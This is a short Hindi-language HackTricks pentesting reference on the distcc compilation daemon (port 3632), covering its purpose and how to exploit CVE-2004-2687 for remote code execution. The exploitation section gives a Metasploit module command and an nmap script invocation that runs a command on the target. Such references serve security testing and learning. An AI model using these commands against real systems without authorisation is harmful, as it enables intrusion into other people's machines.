tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
मूल जानकारी
Distcc एक उपकरण है जो संकलन प्रक्रिया को बढ़ाता है, जो नेटवर्क में अन्य कंप्यूटरों की खाली प्रोसेसिंग शक्ति का उपयोग करता है। जब distcc किसी मशीन पर सेट किया जाता है, तो यह मशीन अपनी संकलन कार्यों को दूसरे सिस्टम में वितरित करने में सक्षम होती है। इस प्राप्तकर्ता सिस्टम पर distccd डेमन चल रहा होना चाहिए और भेजे गए कोड को संसाधित करने के लिए एक संगत संकलक स्थापित होना चाहिए।
डिफ़ॉल्ट पोर्ट: 3632
PORT STATE SERVICE
3632/tcp open distccd
शोषण
जांचें कि क्या यह CVE-2004-2687 के प्रति संवेदनशील है ताकि मनमाने कोड को निष्पादित किया जा सके:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
मुझे नहीं लगता कि shodan इस सेवा का पता लगाता है।
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post created by Álex B (@r1p)
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।